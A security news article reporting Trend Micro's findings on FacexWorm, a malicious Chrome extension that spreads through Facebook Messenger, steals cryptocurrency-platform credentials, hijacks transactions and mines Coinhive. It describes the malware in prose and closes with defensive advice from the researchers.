Another day another security issue. This time, FacexWorm, a malicious Chrome extension, reappears and targets cryptocurrency platforms and stealing users' data.
FacexWorm is an old worm, first detected in August 2017. Reappearing in April, it has been increasing its activities in Germany, Tunisia, Japan, Taiwan, South Korea, and Spain. Just like the original, it sends socially-engineered links to friends of affected Facebook users, spreading via Facebook Messenger.
But unlike the original, this worm steals accounts and credentials related to FacexWorm's targeted sites.
The attack takes potential victims to websites where it injects malicious cryptojacking code, and then redirects victims to the attacker's referral link for crypto-related referral programs. The cybercriminals then hijack the victims' transactions in trading platforms by replacing the recipient address with the attacker's.
As a result, the attacker gets a referral incentive each time a victim registers an account, report researchers from Trend Micro.
Targeted websites include Binance, DigitalOcean, FreeBitco.in, FreeDoge.co.in, and HashFlare.
When FacexWorm first arrives on victims' machines through socially-engineered Facebook links, those unsuspecting people who clicked on the links are then redirected to a fake YouTube page where they are prompted to install a codec extension (FacexWorm) to play a video.
The extension requests privilege to access and edit data on the site.
Problems happen if the permission required by the worm is granted.
FacexWorm can download malicious codes from its command-and-control server, opens Facebook's website, and checks to see whether the propagation function is turned on. If it is, the extension requests an OAuth token from Facebook.
It then performs a sequence of queries to collect the victims' friend list, and sends fake YouTube video links again to contacts who are online or idle.
"FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine," explained Trend Micro fraud researcher Joseph Chen in a blog post. "Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage."
This JavaScript code, is an obfuscated Coinhive script miner connected to a Coinhive pool, configured to use 20 percent of the target system's CPU power.
FacexWorm has the capability of preventing itself from being removed by the victims. If FacexWorm detects that the user is opening the Chrome extension management page via chrome://extensions/, it will immediately close the opened tab as a precaution.
This prevents users from accessing Chrome's management page address.
Both Chrome Web Store and Facebook Messenger can detect such malicious activities. But their blocking and removing capabilities weren't fast enough.
Trend Micro advised users to practice good security habits to avoid falling from this threats or anything similar.
"Think before sharing, be more prudent against unsolicited or suspicious messages, and enable tighter privacy settings for your social media accounts."